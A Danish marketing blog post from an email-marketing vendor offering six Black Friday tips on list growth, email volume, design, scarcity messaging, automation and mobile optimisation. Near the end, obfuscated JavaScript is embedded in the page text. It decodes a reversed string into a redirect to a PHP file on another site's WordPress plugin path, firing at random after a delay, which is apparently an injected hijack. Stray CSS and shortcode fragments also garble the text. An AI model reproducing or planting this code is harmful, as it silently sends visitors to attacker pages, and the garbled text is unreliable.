Black Friday behøver efterhånden ikke nogen særlig introduktion, da vi i Danmark i allerhøjeste grad har taget udsalgsdagen(e) med amerikansk oprindelse til os. I år falder den store shoppe-fredag på d. 24. november, hvilket betyder, at der i skrivende stund er ganske kort tid til, at udsalget brager igennem på alle frekvenser.
Arbejder du med e-handel, er du forhåbentlig allerede supergodt forberedt på udsalgs-frenzy og har styr på alle dine e-maillister, workflows, mobiloptimering etc. I så fald: good for you 🙂 Hvis det derimod ikke er tilfældet, giver vi dig her 6 hurtige tips til Black Friday-forberedelser, du kan læse på under 6 minutter. Vi kan desværre ikke love, du kan nå at implementere alle forslag herunder på samme tid, men hvis du virkelig tager arbejdshandskerne på, kan du stadig nå at forbedre dit fundament for salgssucces frem til de fire shoppedage, det i alt bliver til – fra Black Friday til Cyber Monday den efterfølgende mandag.
Her får du vores 6 Black Friday-tips til din (e-mail)marketingindsats:
to, Oxygen-Sans, Ubuntu, Cantarell, ‘Helvetica Neue’, sans-serif;”>Tip 1: Se at få flest mulige modtagere til din(e) e-mailliste(r). Hvis ikke du har nogen interesserede modtagere, du kan dele dine gode tilbud med, bliver alle dine store e-mailmarketing-armbevægelser i grunden overflødige. Samtidig kan nye leads/e-mailadresser jo bruges med fordel resten af året. Et par stykker vil formentlig afmelde sig igen efter Black Friday, men med meget stor sandsynlighed ikke alle, – hvis de ellers bryder sig om dine produkter/services i øvrigt.
Brug de sociale medier til at få flere til at skrive sig op til at modtage dine nyhedsbreve med dine Black Friday-tilbud. Er du på Globase V3, kan dette gøres nemt på Facebook med vores Facebook-app, der gør det muligt at sætte en nyhedsbrevs-tilmeldingsformular op til din virksomheds profilside med blot få klik. Derudover er Facebooks eget annonceformat Facebook Lead Ads som skabt til at få flere glade modtagere på dine lister! Med værktøjet Zapier får du dem nemt eksporteret fra Facebook over i dit e-mailmarketingsystem. En anden oplagt metode til at få flere tilmeldte kan være brug af pop-ups på din hjemmeside. Kort og godt: Slå ekstra meget på tromme for dig selv op til Black Friday, så folk ved, de bør tilmelde sig nyhedsmails fra dig, hvis de ikke vil misse dine eksklusive tilbud!
to, Oxygen-Sans, Ubuntu, Cantarell, ‘Helvetica Neue’, sans-serif;”>Tip 2: Vær ikke nærig med dine e-mails på lige denne ene dag. Send meget gerne mere end én mail – nærmest uanset hvad dit produkt eller service er. De to herrer bag den populære danske marketing-podcast to, Oxygen-Sans, Ubuntu, Cantarell, ‘Helvetica Neue’, sans-serif;” href=”http://marketingbrief.dk/black-friday/”>“Marketing Brief” har et forslag til en tommelfingerregel, der godt nok er givet med et glimt i øjet, men som samtidig sagtens kan bruges til inspiration: Prøv at tænke på det højeste antal e-mails, du kunne forestille dig at sende ud på Black Friday – og gang så det med 2. Dér har du muligvis dit magic number. Pointen er selvfølgelig ikke, at der findes et perfekt antal e-mails, der gælder for alle, – men derimod, at du gerne må ‘presse citronen’ lidt ekstra denne ene dag på året.
Tip 3: Overvej dit e-maildesign lidt ekstra. I forbindelse med ovenstående er det værd at tænke på, at dine e-mails gerne må have en tydelig grafisk sammenhæng, så din modtager (ekstra) nemt kan aflæse, de er fra dig – særligt, hvis de indgår i en særlig tilbuds-serie. Tænk på, at de fleste forbrugere på denne dag modtager maaaange e-mails, og det derfor bliver ekstra vigtigt at kunne skille sig ud fra mængden. Brug et design, der gør dit budskab sjovt og hurtigt at aflæse – og dig selv letgenkendelig som afsender.
Tip 4: Tænk i scarcity og urgency, når du skriver dine e-mails. Benyt dig af basal adfærdspsykologi, når du skriver dine tekster ved at understrege, at dine tilbud gælder for et begrænset antal varer (knaphed) – og kun i en begrænset periode. Brug praktiske virkemidler som for eksempel en nedtælling i dine e-mails – både i forhold til antal varer tilbage på lager og for den tid, der er tilbage af det pågældende tilbud. Det lyder måske banalt, men det virker!
Tip 5: Automatisér! Forbind din varebeholdning med dit e-mailmarketingsystem, så du kan gøre brug af tip nr. 4 og give dine modtagere besked, når dit varelager reduceres. Husk også at justere dit “Abandoned shopping cart”-flow, der giver dine kunder besked, hvis de har forladt din hjemmeside efter at have puttet varer i indkøbskurven uden at have afsluttet et køb. I tilfældet med Black Friday giver det mening at have kortere tid end sædvanligt mellem kundens afbrudte indkøb og så din påmindelse, da hele udsalget afvikles over så kort en periode. Sørg for at få det justeret passende til anledningen.
to, Oxygen-Sans, Ubuntu, Cantarell, ‘Helvetica Neue’, sans-serif;”>Tip 6: Sørg for, dine e-mails og landing pages er optimeret til mobil. Det er et godt gammelt råd, men det er ikke desto mindre vigtigt – OGSÅ i forbindelse med Black Friday. Undersøgelser viser, at køb i høj grad sker på tværs af enheder – særligt ifm. udsalgsdage med stor opmærksomhed som Black Friday. Ofte bruges desktop som stedet, hvor produkter og tilbud undersøges og sammenlignes – og så bruges mobilen til at afslutte/gennemføre købet. Et lille tip i denne forbindelse: Benytter du Globase V3 som e-mailmarketing-platform med den indbyggede e-mail-editor, sikrer du dig, at dine e-mails automatisk er responsive på alle platforme – altid.
Det var de 6 fra os. Vi ønsker alle stor e-mailsucces og tilbudslykke på fredag!
to, Oxygen-Sans, Ubuntu, Cantarell, ‘Helvetica Neue’, sans-serif;”> ) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tom” text_color=”#ffffff” title_tag=”h3″ controls=”bottom” btn_link=”url:http%3A%2F%2Fwww.globase.dk%2Fkontakt|||” btn_label=”Kontakt os nu!” btn_style=”outlined” btn_color=”white”]Lad Globase hjælpe dig med at få e-commerce og e-mailmarketing til at spille optimalt sammen.
”Klar